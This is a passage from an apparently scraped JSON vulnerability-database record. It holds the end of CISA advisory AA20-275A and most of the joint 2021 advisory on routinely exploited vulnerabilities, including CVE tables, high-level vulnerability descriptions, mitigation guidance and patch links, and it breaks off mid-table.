(Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2012 R2 (Server Core installation)\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1803 (Server Core Installation)\n| \n\n * [Microsoft Security Advisory for CVE-2019-0803](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803>) \n \n[CVE-2017-6327](<https://nvd.nist.gov/vuln/detail/CVE-2017-6327>) | \n\n * Symantec Messaging Gateway before 10.6.3-267\n| \n\n * [Broadcom Security Updates Detial for CVE-2017-6327 and CVE-2017-6328 
](<https://www.broadcom.com/support/security-center/securityupdates/detail?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00>) \n[CVE-2020-3118](<https://nvd.nist.gov/vuln/detail/CVE-2020-3118>) | \n\n * ASR 9000 Series Aggregation Services Routers\n * Carrier Routing System (CRS)\n * IOS XRv 9000 Router\n * Network Convergence System (NCS) 540 Series Routers\n * NCS 560 Series Routers\n * NCS 1000 Series Routers\n * NCS 5000 Series Routers\n * NCS 5500 Series Routers\n * NCS 6000 Series Routers\n| \n\n * [Cisco Security Advisory cisco-sa-20200205-iosxr-cdp-rce](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200205-iosxr-cdp-rce>) \n[CVE-2020-8515](<https://nvd.nist.gov/vuln/detail/CVE-2020-8515>) | \n\n * DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices\n| \n\n * [Draytek Security Advisory: Vigor3900 / Vigor2960 / Vigor300B Router Web Management Page Vulnerability (CVE-2020-8515)](<https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-\\(cve-2020-8515\\)/>) \n \n 2. **Implement rigorous configuration management programs. **Audit configuration management programs to ensure they can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses. Implementing a robust configuration and patch management program hinders sophisticated APT operations by limiting the effectiveness of opportunistic attacks. \n\n 3. **Disable unnecessary ports, protocols, and services.** Review network security device logs and determine whether to shut off unnecessary ports and protocols. Monitor common ports and protocols for C2 activity. Turn off or disable any unnecessary services or functionality within devices (e.g., universal plug and play [UPnP], PowerShell). \n\n 4. 
**Enhance monitoring of network and email traffic.** Review network signatures and indicators for focused operations activities, monitor for new phishing themes, and adjust email rules accordingly. Follow best practices of restricting attachments via email. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse. \n\n 5. **Use protection capabilities to stop malicious activity.** Implement antivirus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use network intrusion detection and prevention systems to identify and prevent commonly employed adversarial malware and limit nefarious data transfers.\n\n### Contact Information\n\nCISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at:\n\n * 1-888-282-0870 (From outside the United States: +1-703-235-8832)\n * [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>) (UNCLASS)\n\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. 
Reporting forms can be found on the CISA homepage at <http://www.us-cert.cisa.gov/>.\n\n### Revisions\n\nOctober 1, 2020: Initial Version|October 20, 2020: Recommended 
Actions Section Updated\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-20T12:00:00", "type": "ics", "title": "Potential for China Cyber Response to Heightened U.S.\u2013China Tensions", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2015-4852", "CVE-2017-6327", "CVE-2017-6328", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-16278", "CVE-2019-1652", "CVE-2019-1653", "CVE-2019-16920", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1040", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-6789", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-20T12:00:00", "id": "AA20-275A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-275a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:27:11", "description": "### Summary\n\nThis joint Cybersecurity Advisory (CSA) was coauthored by cybersecurity 
authorities of the United States, Australia, Canada, New Zealand, and the United Kingdom: the Cybersecurity and Infrastructure Security Agency ([CISA](<https://www.cisa.gov/>)), National Security Agency ([NSA](<https://www.nsa.gov/Cybersecurity/>)), Federal Bureau of Investigation ([FBI](<https://www.fbi.gov/investigate/cyber>)), Australian Cyber Security Centre ([ACSC](<https://www.cyber.gov.au/>)), Canadian Centre for Cyber Security ([CCCS](<https://www.cyber.gc.ca/en/>)), New Zealand National Cyber Security Centre ([NZ NCSC](<https://www.gcsb.govt.nz/>)), and United Kingdom\u2019s National Cyber Security Centre ([NCSC-UK](<https://www.ncsc.gov.uk/>)). This advisory provides details on the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.\n\nU.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities assess, in 2021, malicious cyber actors aggressively targeted newly disclosed critical software vulnerabilities against broad target sets, including public and private sector organizations worldwide. To a lesser extent, malicious cyber actors continued to exploit publicly known, dated software vulnerabilities across a broad spectrum of targets. \n\nThe cybersecurity authorities encourage organizations to apply the recommendations in the Mitigations section of this CSA. These mitigations include applying timely patches to systems and implementing a centralized patch management system to reduce the risk of compromise by malicious cyber actors.\n\nDownload the Joint Cybersecurity Advisory: 2021 top Routinely Exploited Vulnerabilities (pdf, 777kb).\n\n### Technical Details\n\n#### **Key Findings**\n\nGlobally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. 
For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability\u2019s disclosure, likely facilitating exploitation by a broader range of malicious actors.\n\nTo a lesser extent, malicious cyber actors continued to exploit publicly known, dated software vulnerabilities\u2014some of which were also [routinely exploited in 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) or earlier. The exploitation of older vulnerabilities demonstrates the continued risk to organizations that fail to patch software in a timely manner or are using software that is no longer supported by a vendor.\n\n#### **Top 15 Routinely Exploited Vulnerabilities**\n\nTable 1 shows the top 15 vulnerabilities U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities observed malicious actors routinely exploiting in 2021, which include:\n\n * **CVE-2021-44228.** This vulnerability, known as Log4Shell, affects Apache\u2019s Log4j library, an open-source logging framework. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system that causes that system to execute arbitrary code. The request allows a cyber actor to take full control over the system. The actor can then steal information, launch ransomware, or conduct other malicious activity.[1] Log4j is incorporated into thousands of products worldwide. This vulnerability was disclosed in December 2021; the rapid widespread exploitation of this vulnerability demonstrates the ability of malicious actors to quickly weaponize known vulnerabilities and target organizations before they patch.\n * **CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065.** These vulnerabilities, known as ProxyLogon, affect Microsoft Exchange email servers. 
Successful exploitation of these vulnerabilities in combination (i.e., \u201cvulnerability chaining\u201d) allows an unauthenticated cyber actor to execute arbitrary code on vulnerable Exchange Servers, which, in turn, enables the actor to gain persistent access to files and mailboxes on the servers, as well as to credentials stored on the servers. Successful exploitation may additionally enable the cyber actor to compromise trust and identity in a vulnerable network.\n * **CVE-2021-34523, CVE-2021-34473, CVE-2021-31207.** These vulnerabilities, known as ProxyShell, also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (i.e., Microsoft\u2019s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers. \n * **CVE-2021-26084.** This vulnerability, affecting Atlassian Confluence Server and Data Center, could enable an unauthenticated actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a POC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021.\n\nThree of the top 15 routinely exploited vulnerabilities were also [routinely exploited in 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>): CVE-2020-1472, CVE-2018-13379, and CVE-2019-11510. 
Their continued exploitation indicates that many organizations fail to patch software in a timely manner and remain vulnerable to malicious cyber actors.\n\n_Table 1: Top 15 Routinely Exploited Vulnerabilities in 2021_\n\nCVE | Vulnerability Name | Vendor and Product | Type\n---|---|---|---\n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) | Log4Shell | Apache Log4j | Remote code execution (RCE)\n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) | | Zoho ManageEngine AD SelfService Plus | RCE\n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>) | ProxyShell | Microsoft Exchange Server | Elevation of privilege\n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>) | ProxyShell | Microsoft Exchange Server | RCE\n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>) | ProxyShell | Microsoft Exchange Server | Security feature bypass\n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) | ProxyLogon | Microsoft Exchange Server | RCE\n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>) | ProxyLogon | Microsoft Exchange Server | RCE\n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>) | ProxyLogon | Microsoft Exchange Server | RCE\n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) | ProxyLogon | Microsoft Exchange Server | RCE\n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) | | Atlassian Confluence Server and Data Center | Arbitrary code execution\n[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>) | | VMware vSphere Client | RCE\n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | ZeroLogon | Microsoft Netlogon Remote Protocol (MS-NRPC) | Elevation of privilege\n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) | | Microsoft Exchange Server | RCE\n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | | Pulse Secure Pulse Connect Secure | Arbitrary file reading\n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) | | Fortinet FortiOS and FortiProxy | Path traversal\n\n#### **Additional Routinely Exploited Vulnerabilities**\n\nIn addition to the 15 vulnerabilities listed in table 1, U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities identified vulnerabilities, listed in table 2, that were also routinely exploited by malicious cyber actors in 2021. \n\nThese vulnerabilities include multiple vulnerabilities affecting internet-facing systems, including Accellion File Transfer Appliance (FTA), Windows Print Spooler, and Pulse Secure Pulse Connect Secure. 
Three of these vulnerabilities were also [routinely exploited in 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>): CVE-2019-19781, CVE-2019-18935, and CVE-2017-11882.\n\n_Table 2: Additional Routinely Exploited Vulnerabilities in 2021_\n\nCVE | Vendor and Product | Type\n---|---|---\n[CVE-2021-42237](<https://nvd.nist.gov/vuln/detail/CVE-2021-42237>) | Sitecore XP | RCE\n[CVE-2021-35464](<https://nvd.nist.gov/vuln/detail/CVE-2021-35464>) | ForgeRock OpenAM server | RCE\n[CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>) | Accellion FTA | OS command execution\n[CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>) | Accellion FTA | Server-side request forgery\n[CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>) | Accellion FTA | OS command execution\n[CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>) | Accellion FTA | SQL injection\n[CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>) | VMware vCenter Server | RCE\n[CVE-2021-20038](<https://nvd.nist.gov/vuln/detail/CVE-2021-20038>) | SonicWall Secure Mobile Access (SMA) | RCE\n[CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>) | Microsoft MSHTML | RCE\n[CVE-2021-34527](<https://nvd.nist.gov/vuln/detail/CVE-2021-34527>) | Microsoft Windows Print Spooler | RCE\n[CVE-2021-3156](<https://nvd.nist.gov/vuln/detail/CVE-2021-3156>) | Sudo | Privilege escalation\n[CVE-2021-27852](<https://nvd.nist.gov/vuln/detail/CVE-2021-27852>) | Checkbox Survey | Remote arbitrary code execution\n[CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>) | Pulse Secure Pulse Connect Secure | Remote arbitrary code execution\n[CVE-2021-20016](<https://nvd.nist.gov/vuln/detail/CVE-2021-20016>) | SonicWall SSLVPN SMA100 | Improper SQL command neutralization, allowing for credential access\n[CVE-2021-1675](<https://nvd.nist.gov/vuln/detail/CVE-2021-1675>) | Windows Print Spooler | RCE\n[CVE-2020-2509](<https://nvd.nist.gov/vuln/detail/CVE-2020-2509>) | QNAP QTS and QuTS hero | Remote arbitrary code execution\n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | Citrix Application Delivery Controller (ADC) and Gateway | Arbitrary code execution\n[CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) | Progress Telerik UI for ASP.NET AJAX | Code execution\n[CVE-2018-0171](<https://nvd.nist.gov/vuln/detail/CVE-2018-0171>) | Cisco IOS Software and IOS XE Software | Remote arbitrary code execution\n[CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) | Microsoft Office | RCE\n[CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>) | Microsoft Office | RCE\n\n### Mitigations\n\n#### **Vulnerability and Configuration Management**\n\n * Update software, operating systems, applications, and firmware on IT network assets in a timely manner. Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), especially those CVEs identified in this CSA, and then critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment. For patch information on CVEs identified in this CSA, refer to the appendix. \n * If a patch for a known exploited or critical vulnerability cannot be quickly applied, implement vendor-approved workarounds.\n * Use a centralized patch management system.\n * Replace end-of-life software, i.e., software that is no longer supported by the vendor. 
For example, Accellion FTA was retired in April 2021.\n * Organizations that are unable to perform rapid scanning and patching of internet-facing systems should consider moving these services to mature, reputable cloud service providers (CSPs) or other managed service providers (MSPs). Reputable MSPs can patch applications\u2014such as webmail, file storage, file sharing, and chat and other employee collaboration tools\u2014for their customers. However, as MSPs and CSPs expand their client organization's attack surface and may introduce unanticipated risks, organizations should proactively collaborate with their MSPs and CSPs to jointly reduce that risk. For more information and guidance, see the following resources. \n * CISA Insights [Risk Considerations for Managed Service Provider Customers](<https://cisa.gov/sites/default/files/publications/cisa-insights_risk-considerations-for-msp-customers_508.pdf>)\n * CISA Insights [Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses](<https://cisa.gov/sites/default/files/publications/CISA Insights_Guidance-for-MSPs-and-Small-and-Mid-sized-Businesses_S508C.pdf>)\n * ACSC advice on [How to Manage Your Security When Engaging a Managed Service Provider](<https://www.cyber.gov.au/acsc/view-all-content/publications/how-manage-your-security-when-engaging-managed-service-provider>)\n\n#### **Identity and Access Management**\n\n * Enforce multifactor authentication (MFA) for all users, without exception.\n * Enforce MFA on all VPN connections. If MFA is unavailable, require employees engaging in remote work to use strong passwords. \n * Regularly review, validate, or remove privileged accounts (annually at a minimum).\n * Configure access control according to the principle of least privilege. 
\n * Ensure software service accounts only provide necessary permissions (least privilege) to perform intended functions (non-administrative privileges).\n\n**Note:** see [CISA Capacity Enhancement Guide \u2013 Implementing Strong Authentication](<https://cisa.gov/sites/default/files/publications/CISA_CEG_Implementing_Strong_Authentication_508_1.pdf>) and ACSC guidance on [Implementing Multi-Factor Authentication](<https://www.cyber.gov.au/acsc/view-all-content/publications/implementing-multi-factor-authentication>) for more information on hardening authentication systems.\n\n#### **Protective Controls and Architecture**\n\n * Properly configure and secure internet-facing network devices, disable unused or unnecessary network ports and protocols, encrypt network traffic, and disable unused network services and devices. \n * Harden commonly exploited enterprise network services, including Link-Local Multicast Name Resolution (LLMNR) protocol, Remote Desktop Protocol (RDP), Common Internet File System (CIFS), Active Directory, and OpenLDAP.\n * Manage Windows Key Distribution Center (KDC) accounts (e.g., KRBTGT) to minimize Golden Ticket attacks and Kerberoasting.\n * Strictly control the use of native scripting applications, such as command-line, PowerShell, WinRM, Windows Management Instrumentation (WMI), and Distributed Component Object Model (DCOM).\n * Segment networks to limit or block lateral movement by controlling access to applications, devices, and databases. Use private virtual local area networks. \n * Continuously monitor the attack surface and investigate abnormal activity that may indicate lateral movement of a threat actor or malware. \n * Use security tools, such as endpoint detection and response (EDR) and security information and event management (SIEM) tools. 
Consider using an information technology asset management (ITAM) solution to ensure your EDR, SIEM, vulnerability scanner, etc., are reporting the same number of assets.\n * Monitor the environment for potentially unwanted programs.\n * Reduce third-party applications and unique system/application builds; provide exceptions only if required to support business critical functions.\n * Implement application allowlisting. \n\n### **Resources**\n\n * For the top vulnerabilities exploited in 2020, see joint CSA [Top Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>).\n * For the top exploited vulnerabilities 2016 through 2019, see joint CSA [Top 10 Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa20-133a>). \n * See the appendix for additional partner resources on the vulnerabilities mentioned in this CSA.\n\n### **Disclaimer**\n\nThe information in this report is being provided \u201cas is\u201d for informational purposes only. CISA, the FBI, NSA, ACSC, CCCS, NZ NCSC, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. 
Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.\n\n### **Purpose**\n\nThis document was developed by U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.\n\n### **References**\n\n[1] [CISA\u2019s Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>)\n\n### **Appendix: Patch Information and Additional Resources for Top Exploited Vulnerabilities**\n\nCVE\n\n| \n\nVendor\n\n| \n\nAffected Products\n\n| \n\nPatch Information\n\n| \n\nResources \n \n---|---|---|---|--- \n \n[CVE-2021-42237](<https://nvd.nist.gov/vuln/detail/CVE-2021-42237>)\n\n| \n\nSitecore\n\n| \n\nSitecore XP 7.5.0 - Sitecore XP 7.5.2\n\nSitecore XP 8.0.0 - Sitecore XP 8.2.7\n\n| \n\n[Sitecore Security Bulletin SC2021-003-499266](<https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776#HistoryOfUpdates>)\n\n| \n\nACSC Alert [Active Exploitation of vulnerable Sitecore Experience Platform Content Management Systems](<https://www.cyber.gov.au/acsc/view-all-content/alerts/active-exploitation-vulnerable-sitecore-experience-platform-content-management-systems>) \n \n[CVE-2021-35464](<https://nvd.nist.gov/vuln/detail/CVE-2021-35464>)\n\n| \n\nForgeRock \n\n| \n\nAccess Management (AM) 5.x, 6.0.0.x, 6.5.0.x, 6.5.1, 6.5.2.x and 6.5.3\n\nOpenAM 9.x, 10.x, 11.x, 12.x and 13.x\n\n| \n\n[ForgeRock AM Security Advisory #202104](<https://backstage.forgerock.com/knowledge/kb/article/a47894244>)\n\n| \n\nACSC Advisory [Active exploitation of ForgeRock Access Manager / OpenAM 
servers](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2021-004-active-exploitation-forgerock-access-manager-openam-servers>)\n\nCCCS [ForgeRock Security Advisory](<https://www.cyber.gc.ca/en/alerts/forgerock-security-advisory>) \n \n[CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n\n| \n\nAccellion \n\n| \n\nFTA 9_12_370 and earlier\n\n| \n\n[Accellion Press Release: Update to Recent FTA Security Incident](<https://www.accellion.com/company/press-releases/accellion-provides-update-to-recent-fta-security-incident/>)\n\n| \n\nJoint CSA [Exploitation of Accellion File Transfer Appliance](<https://www.cisa.gov/uscert/ncas/alerts/aa21-055a>)\n\nACSC Alert [Potential Accellion File Transfer Appliance compromise](<https://www.cyber.gov.au/acsc/view-all-content/alerts/potential-accellion-file-transfer-appliance-compromise>) \n \n[CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>)\n\n| \n\nFTA 9_12_411 and earlier \n \n[CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>)\n\n| \n\nFTA versions 9_12_411 and earlier \n \n[CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>)\n\n| \n\nFTA 9_12_370 and earlier\n\n| \n \n[CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n\n| \n\nVMware \n\n| \n\nvCenter Server 7.0, 6.7, 6.5\n\nCloud Foundation (vCenter Server) 4.x and 3.x\n\n| \n\n[VMware Advisory VMSA-2021-0010](<https://www.vmware.com/security/advisories/VMSA-2021-0010.html>)\n\n| \n\nCCCS [VMware Security Advisory](<https://www.cyber.gc.ca/en/alerts/vmware-security-advisory-41>) \n \n[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)\n\n| \n\nVMware\n\n| \n\nvCenter Server 7.0, 6.7, 6.5\n\nCloud Foundation (vCenter Server) 4.x and 3.x\n\n| \n\n[VMware Advisory VMSA-2021-0002](<https://www.vmware.com/security/advisories/VMSA-2021-0002.html>)\n\n| \n\nACSC Alert [VMware vCenter Server plugin remote code execution 
vulnerability](<https://www.cyber.gov.au/acsc/view-all-content/alerts/vmware-vcenter-server-plugin-remote-code-execution-vulnerability-cve-2021-21972>)\n\nCCCS [VMware Security Advisory](<https://www.cyber.gc.ca/en/alerts/vmware-security-advisory-35>)\n\nCCCS Alert [APT Actors Target U.S. and Allied Networks - Update 1](<https://www.cyber.gc.ca/en/alerts/apt-actors-target-us-and-allied-networks-nsacisafbi>) \n \n[CVE-2021-20038](<https://nvd.nist.gov/vuln/detail/CVE-2021-20038>)\n\n| \n\nSonicWall\n\n| \n\nSMA 100 Series (SMA 200, 210, 400, 410, 500v), versions 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv\n\n| \n\n[SonicWall Security Advisory SNWLID-2021-0026](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>)\n\n| \n\nACSC Alert [Remote code execution vulnerability present in SonicWall SMA 100 series appliances](<https://www.cyber.gov.au/acsc/view-all-content/alerts/remote-code-execution-vulnerability-present-sonicwall-sma-100-series-appliances>)\n\nCCCS [SonicWall Security Advisory](<https://www.cyber.gc.ca/en/alerts/sonicwall-security-advisory-4>) \n \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)\n\n| \n\nApache\n\n| \n\nLog4j, all versions from 2.0-beta9 to 2.14.1\n\nFor other affected vendors and products, see [CISA's GitHub repository](<https://github.com/cisagov/log4j-affected-db>).\n\n| \n\n[Log4j: Apache Log4j Security Vulnerabilities](<https://logging.apache.org/log4j/2.x/security.html>)\n\nFor additional information, see joint CSA: [Mitigating Log4Shell and Other Log4j-Related Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-356a>)\n\n| \n\nCISA webpage [Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>)\n\nCCCS [Active exploitation of Apache Log4j vulnerability - Update 7](<https://www.cyber.gc.ca/en/alerts/active-exploitation-apache-log4j-vulnerability>) \n \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)\n\n| \n\nZoho 
| CVE | Vendor | Affected Products | Patch Available | Resources |
|---|---|---|---|---|
| | ManageEngine | ADSelfService Plus version 6113 and prior | [Zoho ManageEngine: ADSelfService Plus 6114 Security Fix Release](<https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6114-security-fix-release>) | Joint CSA [APT Actors Exploiting Newly Identified Vulnerability in ManageEngine ADSelfService Plus](<https://www.cisa.gov/uscert/ncas/alerts/aa21-259a>); CCCS [Zoho Security Advisory](<https://www.cyber.gc.ca/en/alerts/zoho-security-advisory>) |
| [CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>) | Microsoft | Multiple Windows products; see [Microsoft Security Update Guide: MSHTML Remote Code Execution Vulnerability, CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>) | [Microsoft Security Update Guide: MSHTML Remote Code Execution Vulnerability, CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>) | |
| [CVE-2021-34527](<https://nvd.nist.gov/vuln/detail/CVE-2021-34527>) | Microsoft | Multiple Windows products; see [Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>) | [Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>) | Joint CSA [Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability](<https://www.cisa.gov/uscert/ncas/alerts/aa22-074a>); CCCS [Alert Windows Print Spooler Vulnerability Remains Unpatched – Update 3](<https://www.cyber.gc.ca/en/alerts/windows-print-spooler-vulnerability-remains-unpatched>) |
| [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>) | Microsoft | Microsoft Exchange Server 2013 Cumulative Update 23; Microsoft Exchange Server 2016 Cumulative Updates 19 and 20; Microsoft Exchange Server 2019 Cumulative Updates 8 and 9 | [Microsoft Security Update Guide: Microsoft Exchange Server Elevation of Privilege Vulnerability, CVE-2021-34523](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>) | Joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>); ACSC Alert [Microsoft Exchange ProxyShell Targeting in Australia](<https://www.cyber.gov.au/acsc/view-all-content/alerts/microsoft-exchange-proxyshell-targeting-australia>) |
| [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>) | Microsoft | Multiple Exchange Server versions; see [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>) | [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>) | |
| [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>) | Microsoft | Multiple Exchange Server versions; see [Microsoft Update Guide: Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>) | [Microsoft Update Guide: Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>) | |
| [CVE-2021-3156](<https://nvd.nist.gov/vuln/detail/CVE-2021-3156>) | Sudo | Sudo before 1.9.5p2 | [Sudo Stable Release 1.9.5p2](<https://www.sudo.ws/releases/stable/#1.9.5p2>) | |
| [CVE-2021-27852](<https://nvd.nist.gov/vuln/detail/CVE-2021-27852>) | Checkbox Survey | Checkbox Survey versions prior to 7 | | |
